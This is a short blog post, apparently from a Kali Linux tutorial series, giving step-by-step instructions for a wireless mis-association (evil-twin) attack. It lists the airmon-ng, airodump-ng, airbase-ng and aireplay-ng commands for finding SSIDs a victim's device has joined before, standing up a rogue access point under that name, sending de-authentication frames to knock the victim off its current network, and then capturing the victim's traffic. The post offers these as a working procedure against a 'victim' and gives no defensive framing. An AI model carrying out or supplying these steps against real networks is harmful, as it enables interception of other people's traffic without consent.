The technique of mis-association attack is to get a computer
connect to your Kali machine using one of the old Wirelesses that it has
connected before. Or use the same SSID name as is available and has some
clients. For example, if a computer was connected to a WIFI network called
“Public-wifi” in the past, that name will be discovered and used to attack to
the host.
The steps are as below:
- Find one of the wireless SSID names that the victim has connected before using “airodump-ng”
- Set up a new access point with exactly the same name
- Send a de-auth message to the victim to it will be disconnected from the current AP and try to connect again
- As the SSID you created is already on the victim’s list, it will be connected to your created AP.
- You can start capture victim’s traffic!
To achieve this below steps
need to be followed:
- airmon-ng start wlan0
- airodump-ng mon0 -- You can see the station is trying to connect to a list of Aps that it has connected before (probe column) - e.g Public-wifi
Note: make sure that SSID is not available on the
current list of APs
- airbase-ng -essid “Public-wifi” -c 1 mon0 -- This will make Kali an access point and client can authenticate and connect
- Set up DHCP and other setting as per previous section (Rogue access points)
- Now the client station will try to connect to your computer as it has the same SSID on its database
- If client machine is already connected to another WIFI, start a de-auth attach as below
- aireplay-ng -0 0 -a 22:AF:3A:5E:22:3D mon0 -- Force clients to reauthenticate and connect to our machine
- Monitor the output of airbase-ng command to see when the victim connects
No comments:
Post a Comment